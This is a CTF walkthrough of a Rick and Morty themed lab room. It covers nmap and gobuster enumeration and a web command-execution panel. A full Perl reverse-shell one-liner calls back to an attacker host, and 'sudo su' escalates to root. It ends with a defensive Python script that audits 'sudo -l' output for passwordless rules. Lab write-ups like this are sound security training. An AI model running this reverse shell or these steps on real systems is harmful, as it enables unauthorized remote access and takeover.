A Rick and Morty CTF. Help turn Rick back into a human! The link to the room is here
This is a Rick and Morty themed challenge, and we play Morty. We have to exploit a web server to find the 3 ingredients that will help Rick make the potion that turns him back into a human from a pickle. Let's use our hacking super power, hack the web server and save Rick.
Launch the box and let’s enumerate the IP given.
Use: nmap -sC -sV -A machine_IP
- nmap -> network mapper tool
- -sC -> default script scanning
- -sV -> version detection
- -A -> aggressive scan (OS detection, version detection, script scanning and traceroute)
We can see that ports 22 and 80 are open. Port 22 is SSH (secure shell) and port 80 is HTTP. Let's open the browser, paste the IP there and check what is waiting for us.
Let's spend some time enumerating this website. While that runs, let's view the page source.
A username is found here. Let's do directory enumeration and check for other directories as well.
Use: gobuster dir -u http://machine_ip -w wordlist_path
- gobuster -> directory/file brute-forcing tool
- dir -> directory enumeration mode
- -u -> target URL
- -w -> path to the wordlist
The results say there are many directories. Let's open them one by one. (I forgot to take a screenshot.)
- /login.php
- /robots.txt
- /assets
Here I think we got a password. Let's try the password together with the username we already have.
I viewed the source code of the logged-in page and found something interesting.
I guess we have a base64-encoded password. Let's go to CyberChef to decode it.
I had to decode it almost 9 times before I understood it was a rabbit hole, but that's OK. Keep moving forward, we need to save Rick.
Let’s check the logged in page.
Wait, that's strange! Why is there a command panel here? Let's execute some basic commands and see.
This page has a command execution vulnerability. Let's try some more commands.
It seems our commands are being sanitized, which means some of what we type will not be executed; it is filtered out before it reaches the shell on the server.
Got another idea: we can get a reverse shell from here. I used a Perl reverse shell one-liner.
Use: perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Start a listener on the port you set in the one-liner.
Execute the command on the website and catch the shell on the listener.
Now let's run some commands in the /var/www/html directory.
Now let's move around the server and find the other two secret ingredients. Let's go to the /home directory and search.
We are one step away from saving Rick.
Use: sudo -l
- -l -> list the commands the current user is allowed to run with sudo
We found something very interesting: this user can run everything with sudo without a password.
Time for privilege escalation.
Use: sudo su
We finally saved Rick.
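The sudo finding above is the kind of misconfiguration a defender wants to catch before a CTF player (or an attacker) does. The following Python snippet is an added example, not part of the original writeup: it parses the output of sudo -l and flags passwordless rules. The sample output, the hostname pickle and the second rule are constructed assumptions that mimic the shape of the finding.

```python
"""Audit `sudo -l` output for rules that allow passwordless privilege escalation."""
import re

# Constructed sample in the format `sudo -l` prints; not captured from the actual box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on pickle:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on pickle:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/less /var/log/syslog
"""

# One line of the "may run the following commands" block looks like:
#   (runas_user[:runas_group]) [TAG1: TAG2:] command [, command ...]
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return a list of (runas, tags, command) tuples from `sudo -l` output."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True  # everything after this header is a sudo rule
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas, tag_blob, cmds = m.groups()
        tags = {t.strip(": ") for t in tag_blob.split() if t.strip()}
        for cmd in cmds.split(","):  # a rule may list several commands
            entries.append((runas.strip(), tags, cmd.strip()))
    return entries


def audit_sudo_entries(entries):
    """'critical' for a passwordless ALL rule, 'review' for any other NOPASSWD rule."""
    findings = []
    for runas, tags, cmd in entries:
        if "NOPASSWD" in tags and cmd == "ALL":
            findings.append(("critical", f"({runas}) NOPASSWD: ALL gives root without a password"))
        elif "NOPASSWD" in tags:
            findings.append(("review", f"({runas}) NOPASSWD: {cmd} runs without a password"))
    return findings


if __name__ == "__main__":
    for severity, msg in audit_sudo_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{severity}] {msg}")
```

Run against real `sudo -l` output from a web-server account, a single "critical" line is exactly the condition this room exploits.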
Summary
- Basic enumeration done: ports 22 and 80 open.
- We did directory enumeration on the website.
- The website had a command execution vulnerability.
- We got a reverse shell using a Perl one-liner.
- We could run sudo without a password.
- We used sudo su to switch to root and captured the flags.
Thank you, peace out ✌️.